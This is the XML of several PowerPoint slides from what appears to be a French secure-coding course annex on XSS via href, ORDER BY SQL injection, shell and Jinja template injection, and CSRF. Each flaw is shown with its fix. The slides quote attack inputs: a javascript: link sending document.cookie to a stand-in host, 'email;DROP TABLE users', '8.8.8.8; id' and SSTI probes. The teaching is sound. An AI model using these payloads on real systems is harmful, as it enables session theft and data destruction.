            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un commentaire n’est pas une URL. L’outil change.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="170078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1005840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Jour 1 : textContent, pas innerHTML. Jour 2 : ?, pas une f-string SQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Même idée partout. Le piège : copier un escape HTML dans une URL, ou l’inverse.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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680313" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Encoder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ANNEXE · encoder</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Quatre endroits. Quatre outils.</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Texte dans la page</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textContent. Le &lt;script&gt; s’affiche. Il ne part pas. Déjà fait.</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HTML riche (un vrai éditeur)</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Un sanitizer (DOMPurify). Pas un regex. Pas innerHTML ’à la main’.</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URL</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new URL(s). Protocole http ou https seulement. javascript: n’est pas une URL.</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SQL</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La valeur dans un ?. Le nom de colonne : allow-list. Jour 2, et le prochain extra.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="42245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 Escape tout » n’existe pas. L’endroit décide de l’outil.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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2</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680313" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Encoder</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ANNEXE · encoder</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javascript: dans un href. innerHTML n’y est pour rien.</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a.href = userLink;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// userLink = "javascript:fetch('https://bad-sector.games/x?c='+document.cookie)"</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const u = new URL(userLink, window.location.origin);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>if (u.protocol !== "http:" &amp;&amp; u.protocol !== "https:") throw new Error("url");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a.href = u.href;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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textContent sur le lien ne change rien : le piège est l’attribut href, pas le texte.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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ORM</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189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ANNEXE · ORM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="987552"/>
            <a:ext cx="10058400" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>L’ORM écrit le SQL. Pas les noms de colonnes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="170078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1005840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Jour 2 : WHERE email = ?  — la valeur ne redevient jamais du code. Ça, l’ORM le fait bien.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ORDER BY, un nom de table, un nom de colonne : ça ne rentre pas dans un ?. Si ça vient du client, allow-list. Sinon c’est le lab SQLi, avec un autre accent.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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ORM</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ANNEXE · ORM</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?sort= vient du client. C’est un nom, pas une valeur.</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  ·  SQLAlchemy ou sqlite, même trou</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 sort = request.args["sort"]   ex.  email;DROP TABLE users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>db.execute(text(f"SELECT * FROM users ORDER BY {sort}"))</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allow-list, comme le schéma JSON</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ALLOWED = {"email": "email", "created": "created_at"}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>col = ALLOWED[sort]          # KeyError si inconnu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>db.execute(text(f"SELECT * FROM users ORDER BY {col}"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># col est VOTRE chaîne. Plus celle du visiteur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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Express : le même dict. Pas de knex magique. Si vous concaténez un identifiant, il sort d’un dictionnaire à vous.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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ORM</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 l’ORM protège, et ce qu’il ne protège pas</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traiter un nom de colonne par allow-list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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3</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343814" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ORM</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 l’ORM protège, et ce qu’il ne protège pas</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Les valeurs. Pas les noms. ORDER BY / FROM interpolé = jour 2.</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traiter un nom de colonne par allow-list</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Comme role dans le JSON : s’il n’est pas dans la liste, il n’existe pas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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05686" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shell et templates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193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10058400" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ANNEXE · shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="987552"/>
            <a:ext cx="10058400" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL, HTML, shell, template : un seul réflexe.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1700784"/>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1005840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Un interpréteur + une chaîne collée = le visiteur écrit du code. Jour 2, c’était SQL. Ici, le shell. Ou Jinja.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>La donnée reste de la donnée. Elle n’entre pas dans la chaîne que l’interpréteur parse.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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05686" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shell et templates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ANNEXE · shell</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ping 8.8.8.8; id   — le shell a lu le point-virgule.</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  ·  une string pour le shell</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os.system(f"ping -c 1 {host}")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># host = "8.8.8.8; id"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># Express : exec(`ping -c 1 ${host}`)</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une liste d’arguments</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subprocess.run(["ping", "-c", "1", host], check=False)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># host est UN argument. Le ; reste du texte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># Express : spawn("ping", ["-c", "1", host])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># jamais exec() avec une string interpolée.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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shell=True, os.system, exec(`…`) : le shell parse. Une liste : pas de shell, pas de ; magique.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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05686" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shell et templates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195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ANNEXE · SSTI</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Jinja n’est pas un fichier HTML. C’est un interpréteur.</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  ·  le visiteur écrit le template</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Template(user_html).render(user=user)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># user_html = "{{ config }}"   ou  "{{ 7*7 }}"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># Le moteur exécute. Pas seulement affiche.</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un fichier à vous</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render_template("mail.html", user=user)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># mail.html est versionné. Le visiteur n'écrit que des VALEURS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># {{ user.name }} dans VOTRE fichier : OK.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># Template(request.form["body"]) : non.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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 7*7 }} dans un champ, ça fait 49 ? Le template exécute. Même famille que l’apostrophe SQL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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05686" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shell et templates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196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reconnaître os.system / exec(`…`) / Template(user)</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passer les args en liste, garder le template versionné</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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4</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1605686" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shell et templates</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197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reconnaître os.system / exec(`…`) / Template(user)</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Un interpréteur.parse(visiteur). Jour 2, c’était la base. Ici, le shell ou Jinja.</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passer les args en liste, garder le template versionné</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spawn([...]). render_template("mail.html"). La donnée n’est pas le programme.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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5</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CSRF</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198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97280" y="658368"/>
            <a:ext cx="6035040" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ANNEXE · CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="987552"/>
            <a:ext cx="6035040" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vous n’avez cliqué sur rien. Le transfert part.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1700784"/>
            <a:ext cx="603504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97280" y="1901952"/>
            <a:ext cx="6035040" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Jour 1 : le navigateur envoie le cookie tout seul. Y compris si c’est un AUTRE site qui poste vers vous.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SameSite=Lax coupe ce POST. Un GET de navigation, lui, passe encore. D’où un token sur les changements d’état.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1325880"/>
            <a:ext cx="1267358" cy="397764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29400" y="1508760"/>
            <a:ext cx="1084478" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Victime</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="2011680"/>
            <a:ext cx="1084478" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
